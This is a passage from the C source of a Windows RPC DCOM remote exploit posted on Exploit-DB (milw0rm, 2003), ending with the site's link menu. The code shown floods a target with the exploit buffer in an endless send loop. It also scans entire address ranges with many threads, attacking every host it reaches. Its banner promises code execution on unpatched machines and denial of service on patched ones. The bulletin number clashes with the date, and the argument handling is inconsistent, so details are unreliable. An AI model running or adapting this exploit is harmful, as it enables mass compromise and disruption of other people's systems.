} 
else {printf("%s - send exploit to %s\n",ip,target_os[vers].target);} 

len=recv(sock,(char *)buf1,1000,NULL); 
bool ft=1; 
if(ft) 
{ 
int i=0; 
while(1) 
{ 
if (send(sock,(const char *)buf2,len1,0)==SOCKET_ERROR) 
{ 
printf("\nSend failed.Error:%d\n",WSAGetLastError()); 
return 0; 
} 
else 
{ 
printf("\r%d",++i); 
} 
//Sleep(1000); 
} 
} 
send(sock,(const char *)buf2,len1,0); 
closesocket(sock); 
} 
else fprintf(fp1,"%s %s\n",target_os[vers].target,ip); 
// fp=fopen("pac","wb"); 
// fwrite(rawData,1,1036,fp); 
// fclose(fp); 
} 
unsigned long thread_count=0; 
char adr[200]; 

DWORD WINAPI ThreadProc( 
LPVOID lpParameter // thread data 
) 
{ 
thread_count++; 
attack(adr,0); 

thread_count--; 
return 0; 
} 

int main(int argc,char ** argv) 
{ 
//printf("%x %x",OF_READWRITE,GETSTRCS(argv[1])); 
//return; 
//HFILE hf=_lopen("asd123",0x1001); 
//printf("%x",hf); 
//_lclose(hf); 
//return; 

if(argc!=2){
fprintf(stderr, "RPC universal exploit. Exploit MS09-039 vulnerability\n"
"unpatched host - to codee xecution\n"
"patched host - to DoS\n"
"based on original XFocus RPCDCOM2 exploit\n"
"modification and shellcode (c) by karlss0n\n"
"downloaded on www.k-otik.com\n"
"\n"
"usage: %s <target_ip>\n",
argv[0]);
return 10;
}

WSADATA wsaData; 

int wVersionRequested; 
wVersionRequested = MAKEWORD( 2, 2 ); 

int err = WSAStartup( wVersionRequested, &wsaData ); 
if ( err != 0 ) { 
/* Tell the user that we could not find a usable */ 
/* WinSock DLL. */ 
return 1; 
} 


if(strchr(argv[1],'.')) 
{ 
attack(argv[1],1); 
Sleep(20000); 
return 2; 
} 
int cb=1,db=1; 
cb=atoi(argv[3]); 
db=atoi(argv[4]); 
long tm=atoi(argv[5]); 
for(int c=cb;c<255;c++) 
{ 
for(int d=db;d<255;d++) 
{ 
sprintf(adr,"%s.%s.%d.%d",argv[1],argv[2],c,d); 
if(thread_count>tm) while(thread_count>tm) Sleep(100); 
CreateThread(NULL,0,&ThreadProc,(void *)"",0,NULL); 
Sleep(10); 
fflush(fp1); 
} 
} 
Sleep(60000); 
fclose(fp1); 
return 0;

}

// milw0rm.com [2003-10-09]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services